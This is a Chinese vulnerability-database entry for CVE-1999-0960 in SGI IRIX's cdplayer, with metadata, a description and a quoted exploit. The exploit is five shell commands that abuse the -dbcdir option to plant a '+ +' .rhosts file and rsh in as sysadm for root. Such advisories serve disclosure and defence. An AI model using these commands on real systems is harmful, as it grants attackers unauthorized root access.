IRIX cdplayer漏洞

36次阅读
没有评论

IRIX cdplayer漏洞

漏洞ID 1105263 漏洞类型 未知
发布时间 1996-11-21 更新时间 2005-05-02
IRIX cdplayer漏洞CVE编号 CVE-1999-0960
IRIX cdplayer漏洞CNNVD-ID CNNVD-199803-012
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19262
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199803-012
|漏洞详情
IRIXcdplayer存在漏洞。本地用户可以通过命令行选项在任意位置创建目录。
|漏洞EXP
source: http://www.securityfocus.com/bid/333/info

A vulnerability exists in the /usr/bin/X11/cdplayer application as shipped with SGI's IRIX operating system. By failing to shed root privileges, and creating arbitrary directories as root, cdplayer allows arbitrary users to gain root on the system.

The -dbcdir option to cdplayer specifies the directory to store information kept by cdplayer. This can be used to create arbitrary directories. By creating a directory belonging to an account whose home directory does not exist, creating a .rhosts file in this directory, and chowning the rhosts file to the account being attacked, any user on the system can obtain root status.

umask 000
cdplayer -dbcdir /usr/admin/
echo "+ +" > /usr/admin/.rhosts
chown root.sys /usr/admin/.rhosts
rsh localhost -l sysadm
|参考资料

来源:SGI
名称:19980301-01-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19980301-01-PX

相关推荐: Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability

Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability 漏洞ID 1099601 漏洞类型 Input Validation Error 发布时间 2003-08-26 更新时间 2003-08-…

正文完
 0